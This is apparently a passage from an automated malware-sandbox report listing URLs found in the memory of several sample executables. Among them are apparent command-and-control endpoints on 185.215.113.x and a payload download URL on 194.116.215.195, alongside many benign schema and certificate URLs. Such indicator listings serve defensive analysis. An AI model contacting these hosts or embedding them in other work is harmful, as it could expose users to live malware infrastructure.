                                    Source: 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
                                    Source: 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 00000013.00000002.2673207759.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000001D.00000002.2792862379.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWindows
                                    Source: 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
                                    Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpk
                                    Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000127E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw#
                                    Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/gA
                                    Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/tSwf
                                    Source: b74664dd7e.exe, 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37I
                                    Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37_A
                                    Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000F5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37m
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/15.113.43/
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/15.113.43/fae1daa8e9eb4e4f9b5846d934f48b15eaa495c49##R
                                    Source: skotes.exe, 0000000B.00000002.3769918015.0000000001516000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php020001
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpKw
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpO
                                    Source: skotes.exe, 0000000B.00000002.3769918015.0000000001516000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpR
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdIO
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpdedcO
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded8OI
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpoft
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/ferences.SourceAumid001?
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/onal
                                    Source: skotes.exe, 0000000B.00000002.3769918015.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/taic
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.116.215.195/12dsvc.exe
                                    Source: axplong.exe, 0000001B.00000002.3769503003.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.116.215.195/12dsvc.exeF
                                    Source: axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                                    Source: axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                                    Source: axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                                    Source: axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                                    Source: axplong.exe, 0000001B.00000002.3771028122.00000000015F9000.00000004.00000020.00020000.00000000.sdmp, 66ed86be077bb_12.exe.27.drString found in binary or memory: http://ocsp.sectigo.com0
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003302000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                                    Source: RegAsm.exe, 00000021.00000002.2744975325.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000311C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000317D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003011000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.000000000314C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003241000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
